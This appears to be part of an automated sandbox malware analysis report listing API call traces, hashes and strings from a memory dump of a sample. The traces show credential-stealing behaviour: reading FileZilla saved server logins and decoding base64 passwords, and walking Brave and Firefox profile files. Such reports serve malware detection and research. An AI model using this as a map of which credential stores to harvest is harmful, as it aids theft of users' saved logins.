                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: 631db039cbc10e1fac4381edbdfb726a74873bc905f473dffbd4711aec522f61
                          • Instruction ID: 7d40c2aa9da09ecffde0a6c3a00ed3a4dc6c17f9dc02ed22b708a88670e107d5
                          • Opcode Fuzzy Hash: 631db039cbc10e1fac4381edbdfb726a74873bc905f473dffbd4711aec522f61
                          • Instruction Fuzzy Hash: 0642B071A0225AABDB11EBB5CC49A6F77B9EF68740F049415F901E7252DB3CD903CB60
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDBEF
                          • lstrlen.KERNEL32(00804CA8), ref: 007DDBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDC17
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007DDC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDC4C
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDC8F
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007DDCD0
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007DDCF0
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007DDD0A
                          • lstrlen.KERNEL32(007FCFEC), ref: 007DDD1D
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDD7B
                          • lstrlen.KERNEL32(00801794), ref: 007DDD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDDA3
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDDAF
                          • lstrlen.KERNEL32(?), ref: 007DDDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 007DDDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDE19
                          • lstrlen.KERNEL32(00801794), ref: 007DDE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DDE6F
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDE7B
                          • lstrlen.KERNEL32(01258F98), ref: 007DDE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDEBB
                          • lstrlen.KERNEL32(00801794), ref: 007DDEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DDEE6
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDEF2
                          • lstrlen.KERNEL32(01259138), ref: 007DDF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDFA5
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDFB1
                          • lstrlen.KERNEL32(01258F98), ref: 007DDFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDFF4
                          • lstrlen.KERNEL32(00801794), ref: 007DDFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE022
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DE02E
                          • lstrlen.KERNEL32(01259138), ref: 007DE03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DE06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 007DE0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 007DE0E7
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DE11F
                          • lstrlen.KERNEL32(0125D580), ref: 007DE12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE155
                          • lstrcat.KERNEL32(00000000,?), ref: 007DE15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE19F
                          • lstrcat.KERNEL32(00000000), ref: 007DE1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007DE1F9
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DE22F
                          • lstrlen.KERNEL32(01259298), ref: 007DE23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE261
                          • lstrcat.KERNEL32(00000000,01259298), ref: 007DE269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007DE988
                          • FindClose.KERNEL32(00000000), ref: 007DE997
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: 5b2d496b669505581981e8de9fa0bb3ad4366bfb2db221acebcff37d926d4b36
                          • Instruction ID: ece2038b86d7063c8bf3589bb5f94bd4b9d22c27b440ad931792f509e25a53aa
                          • Opcode Fuzzy Hash: 5b2d496b669505581981e8de9fa0bb3ad4366bfb2db221acebcff37d926d4b36
                          • Instruction Fuzzy Hash: 78524271A1121ADBDB21EFB4DD89AAE77B9AF54300F044526F845E7352DB38EC078B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D60FF
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D6152
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D6185
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D61B5
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D61F0
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D6223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007D6233
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 1f13d7abb3532fa044c4a06b1305004e34f2a12d21723fa7cd479fa12808202c
                          • Instruction ID: 946a3608e4a814e13389885c7289a5f3c917e4d939dcf536022ceaee930737dc
                          • Opcode Fuzzy Hash: 1f13d7abb3532fa044c4a06b1305004e34f2a12d21723fa7cd479fa12808202c
                          • Instruction Fuzzy Hash: 35522A71A1021A9BDB21EFA4DC49BAE77B9AF54300F148526F945E7352DB38ED03CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6B9D
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6BCD
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6BFD
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 007E6C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007E6C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 007E6C5A
                          • lstrlen.KERNEL32(00000000), ref: 007E6C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 007E6CE2
                          • lstrlen.KERNEL32(00000000), ref: 007E6CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 007E6D6A
                          • lstrlen.KERNEL32(00000000), ref: 007E6D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007E6DF2
                          • lstrlen.KERNEL32(00000000), ref: 007E6E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007E6E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 007E6EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 007E6EC9
                          • LocalFree.KERNEL32(00000000), ref: 007E6ED4
                          • lstrlen.KERNEL32(?), ref: 007E6F6E
                          • lstrlen.KERNEL32(?), ref: 007E6F81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: a70f3733c27390a32d1526070685d0d5b5edbe0fa41cff28d36cb38d6734434f
                          • Instruction ID: ea0b6c494cba2c566103cec3ef7110e0879623f5813683d79fba318c0b5d71a3
                          • Opcode Fuzzy Hash: a70f3733c27390a32d1526070685d0d5b5edbe0fa41cff28d36cb38d6734434f
                          • Instruction Fuzzy Hash: 6C02BB71A1225AABCB11EBB1CC4DA6F7BB9EF58740F149415F802E7252DB3CD8038B60
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E4B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E4B7F
                          • lstrlen.KERNEL32(00804CA8), ref: 007E4B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4BA7
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007E4BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E4BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: cacb6fd275dc6123b8b6d6fc20842203a8047c1514bf5ffe47d54b8937d3799d
                          • Instruction ID: 478ad8d7bbf0d94e32999bb5dd078b36687af06e503da458cde3199303855b60
                          • Opcode Fuzzy Hash: cacb6fd275dc6123b8b6d6fc20842203a8047c1514bf5ffe47d54b8937d3799d
                          • Instruction Fuzzy Hash: 04924170A026498FDB54CF6AC948B5AB7F5AF48718F19816DE809DB3A2D739DC43CB40
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E1291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E12B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E12BF
                          • lstrlen.KERNEL32(00804CA8), ref: 007E12CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E12E7
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007E12F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E133A
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007E135C
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007E1376
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E13AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E13D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E13E2
                          • lstrlen.KERNEL32(00801794), ref: 007E13ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E140A
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1416
                          • lstrlen.KERNEL32(?), ref: 007E1423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1443
                          • lstrcat.KERNEL32(00000000,?), ref: 007E1451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E147A
                          • StrCmpCA.SHLWAPI(?,0125D598), ref: 007E14A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E14E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1535
                          • StrCmpCA.SHLWAPI(?,0125DCF0), ref: 007E1552
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1593
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E15BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E15E4
                          • StrCmpCA.SHLWAPI(?,0125D5C8), ref: 007E1602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1633
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1685
                          • StrCmpCA.SHLWAPI(?,0125D520), ref: 007E16B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E16F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1745
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E17BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E17F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007E181C
                          • FindClose.KERNEL32(00000000), ref: 007E182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 2d468764db3899dd4f5cfec87bc592567f880a0b64004fe1837e6a3fd3bb7234
                          • Instruction ID: bd535bab84b4b236a0069e775f19e4c09e01fd51e2dc556e8f27958aede5427e
                          • Opcode Fuzzy Hash: 2d468764db3899dd4f5cfec87bc592567f880a0b64004fe1837e6a3fd3bb7234
                          • Instruction Fuzzy Hash: 05129371A1124ADBDB21EFB5DC5AAAF77B8AF48300F444529F846E7251DB38DC438B90
                          APIs
                          • wsprintfA.USER32 ref: 007ECBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 007ECC13
                          • lstrcat.KERNEL32(?,?), ref: 007ECC5F
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007ECC71
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007ECC8B
                          • wsprintfA.USER32 ref: 007ECCB0
                          • PathMatchSpecA.SHLWAPI(?,01259178), ref: 007ECCE2
                          • CoInitialize.OLE32(00000000), ref: 007ECCEE
                            • Part of subcall function 007ECAE0: CoCreateInstance.COMBASE(007FB110,00000000,00000001,007FB100,?), ref: 007ECB06
                            • Part of subcall function 007ECAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 007ECB46
                            • Part of subcall function 007ECAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 007ECBC9
                          • CoUninitialize.COMBASE ref: 007ECD09
                          • lstrcat.KERNEL32(?,?), ref: 007ECD2E
                          • lstrlen.KERNEL32(?), ref: 007ECD3B
                          • StrCmpCA.SHLWAPI(?,007FCFEC), ref: 007ECD55
                          • wsprintfA.USER32 ref: 007ECD7D
                          • wsprintfA.USER32 ref: 007ECD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 007ECDB0
                          • wsprintfA.USER32 ref: 007ECDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 007ECDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 007ECE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 007ECE28
                          • CloseHandle.KERNEL32(00000000), ref: 007ECE33
                          • CloseHandle.KERNEL32(00000000), ref: 007ECE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007ECE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 007ECE94
                          • FindNextFileA.KERNEL32(?,?), ref: 007ECF8D
                          • FindClose.KERNEL32(?), ref: 007ECF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
